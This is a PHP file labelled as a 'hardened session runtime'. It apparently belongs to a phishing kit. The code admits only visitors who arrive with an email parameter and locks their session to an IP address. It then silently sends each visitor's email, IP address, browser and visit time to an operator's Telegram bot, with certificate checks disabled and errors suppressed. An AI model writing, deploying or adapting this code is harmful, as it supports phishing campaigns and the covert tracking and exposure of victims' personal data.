<?php
/** Hardened session runtime (reads settings.json safely, no fatals) */
if (session_status() === PHP_SESSION_NONE) session_start();

/* ---- load config from settings.json ---- */
if (!function_exists('ua_cfg')) {
  function ua_cfg(){
    static $C=null; if($C!==null) return $C;
    $C = [
      'enabled'=>false,'duration'=>60,'lock_ip'=>true,
      'param'=>'email','redirect'=>'index.php','notify'=>false,
      'tpl'=>"🆕 New visit for {{email}}\n|SESSION    : #{{session_hash}}\n| + IP Info +\n|IP ADDRESS : {{ip}}\n|LOCATION   : {{location}}\n|BROWSER    : {{browser}}\n|TIME       : {{time_gmt}}",
      'bot'=>'','chat'=>''
    ];
    $p = __DIR__.'/settings.json';
    $j = @json_decode(@file_get_contents($p), true);
    if (is_array($j)){
      $s = $j['session']   ?? [];
      $t = $j['telegram']  ?? [];
      $C['enabled']   = !empty($s['enabled']);
      $C['duration']  = max(1,(int)($s['duration_minutes'] ?? 60));
      $C['lock_ip']   = !empty($s['lock_ip']);
      $C['param']     = (string)($s['require_param_name'] ?? 'email');
      $C['redirect']  = (string)($s['redirect_url'] ?? 'index.php');
      $C['notify']    = !empty($s['notify_new_visit']);
      $tpl            = (string)($s['visit_template'] ?? $C['tpl']);
      if (function_exists('mb_convert_encoding')) {
        $tpl = mb_convert_encoding($tpl, 'UTF-8', 'UTF-8,ISO-8859-1,Windows-1252');
      }
      $C['tpl']       = $tpl;
      $C['bot']       = (string)($t['bot_token'] ?? '');
      $C['chat']      = (string)($t['chat_id'] ?? '');
    }
    return $C;
  }
}

if (!function_exists('ua_browser')) {
  function ua_browser(){
    $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
    if (stripos($ua,'Chrome')!==false && stripos($ua,'Edg')===false && stripos($ua,'OPR')===false) return 'Chrome';
    if (stripos($ua,'Safari')!==false && stripos($ua,'Chrome')===false) return 'Safari';
    if (stripos($ua,'Firefox')!==false) return 'Firefox';
    if (stripos($ua,'Edg')!==false) return 'Edge';
    if (stripos($ua,'OPR')!==false || stripos($ua,'Opera')!==false) return 'Opera';
    return 'Browser';
  }
}

if (!function_exists('ua_send_tg')) {
  function ua_send_tg($text){
    $cfg = ua_cfg(); if (!$cfg['bot'] || !$cfg['chat']) return;
    $payload = ['chat_id'=>$cfg['chat'], 'text'=>$text];
    $url = 'https://api.telegram.org/bot'.$cfg['bot'].'/sendMessage';

    if (function_exists('curl_init')) {
      $ch = curl_init($url);
      curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_HTTPHEADER => ['Content-Type: application/json'],
        CURLOPT_POSTFIELDS => json_encode($payload),
        CURLOPT_CONNECTTIMEOUT => 4,
        CURLOPT_TIMEOUT => 6,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => 0,
      ]);
      @curl_exec($ch);
      @curl_close($ch);
      return;
    }
    $ctx = stream_context_create([
      'http'=>[
        'method'=>'POST',
        'header'=>"Content-Type: application/json\r\n",
        'content'=>json_encode($payload),
        'timeout'=>6
      ],
      'ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]
    ]);
    @file_get_contents($url,false,$ctx);
  }
}

/* ---- main runtime ---- */
$cfg = ua_cfg();
if ($cfg['enabled']) {
  $now = time();
  if (empty($_SESSION['ua_session'])) {
    $_SESSION['ua_session'] = [
      'hash'=>bin2hex(random_bytes(16)),
      'ip'  => $_SERVER['REMOTE_ADDR'] ?? '',
      'since'=>$now,
      'param'=>null,
      'visit_notified'=>false
    ];
  }
  // expiry
  if ($now - ($_SESSION['ua_session']['since'] ?? $now) > ($cfg['duration']*60)) {
    $_SESSION['ua_session'] = [
      'hash'=>bin2hex(random_bytes(16)),
      'ip'  => $_SERVER['REMOTE_ADDR'] ?? '',
      'since'=>$now,
      'param'=>null,
      'visit_notified'=>false
    ];
  }
  // lock by IP
  if ($cfg['lock_ip']) {
    $ip = $_SERVER['REMOTE_ADDR'] ?? '';
    if (!empty($_SESSION['ua_session']['ip']) && $_SESSION['ua_session']['ip'] !== $ip) {
      $_SESSION['ua_session']['ip'] = $ip;
      $_SESSION['ua_session']['param'] = null;
      $_SESSION['ua_session']['since'] = $now;
      $_SESSION['ua_session']['visit_notified'] = false;
    }
  }
  // require param
  if ($cfg['param']) {
    $val = $_SESSION['ua_session']['param'] ?? null;
    if ($val===null || $val==='') {
      $try = $_POST[$cfg['param']] ?? ($_GET[$cfg['param']] ?? '');
      if ($try==='') {
        if ($cfg['redirect']) { header('Location: '.$cfg['redirect']); exit; }
      } else {
        $_SESSION['ua_session']['param'] = (string)$try;
      }
    }
  }
  // new visit notify
  if ($cfg['notify'] && empty($_SESSION['ua_session']['visit_notified'])) {
    $email   = $_SESSION['ua_session']['param'] ?? '';
    $browser = ua_browser();
    $ip      = $_SERVER['REMOTE_ADDR'] ?? '';
    $when    = gmdate('d/m/Y h:i:sa').' GMT';
    $txt = strtr($cfg['tpl'], [
      '{{email}}'        => $email,
      '{{session_hash}}' => $_SESSION['ua_session']['hash'],
      '{{ip}}'           => $ip,
      '{{location}}'     => '-',
      '{{browser}}'      => $browser,
      '{{time_gmt}}'     => $when,
    ]);
    if (function_exists('mb_convert_encoding')) {
      $txt = mb_convert_encoding($txt, 'UTF-8', 'UTF-8,ISO-8859-1,Windows-1252');
    }
    try { ua_send_tg($txt); } catch (Throwable $e) { /* swallow */ }
    $_SESSION['ua_session']['visit_notified'] = true;
  }
}